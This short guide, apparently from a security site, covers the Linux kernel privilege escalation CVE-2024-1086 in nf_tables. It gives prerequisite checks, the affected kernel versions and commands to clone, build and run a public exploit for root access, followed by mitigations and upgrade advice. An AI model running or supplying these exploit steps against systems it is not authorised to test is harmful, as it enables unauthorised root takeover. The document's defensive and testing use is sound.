CVE-2024-1086

Overview

This document describes a privilege escalation vulnerability affecting Linux kernels between versions 5.14 and 6.6. The exploit targets the nf_tables subsystem and is noted as highly unstable, potentially causing system freezes.

Prerequisites

Before attempting to use this exploit, verify:

Kernel Version: Check with uname -r
Namespace Creation: Confirm unprivileged users can create namespaces via sysctl kernel.unprivileged_userns_clone
Kernel Configuration: Verify CONFIG_USER_NS=y in /boot/config-$(uname -r)

Vulnerability Status by Kernel Version

The vulnerability affects most kernels from v5.14.21 through v6.3.13. Later versions (v6.4+) typically fail due to CONFIG_INIT_ON_ALLOC_DEFAULT_ON configuration. Earlier versions (v5.4, v5.10) fail due to code changes or technical issues.

Installation & Execution

N/ASH

git clone https://github.com/Notselwyn/CVE-2024-1086
sudo apt install musl-tools
cd CVE-2024-1086
make
./exploit

Successful exploitation results in root access.

Mitigation

Temporary fix: Disable unprivileged namespace creation:

N/ASH

sudo sysctl -w kernel.unprivileged_userns_clone=0

Permanent fix: Add to /etc/sysctl.d/99-disable-unpriv-userns.conf:

N/A

kernel.unprivileged_userns_clone=0

Recommended: Upgrade to a patched kernel version.

██╗ ██████╗ ███████╗██╗███████╗███╗ ██╗██████╗ ██║██╔═══██╗██╔════╝██║██╔════╝████╗ ██║██╔══██╗ ██║██║ ██║█████╗ ██║█████╗ ██╔██╗ ██║██║ ██║ ██║██║ ██║██╔══╝ ██║██╔══╝ ██║╚██╗██║██║ ██║ ██║╚██████╔╝██║ ██║███████╗██║ ╚████║██████╔╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═══╝╚═════╝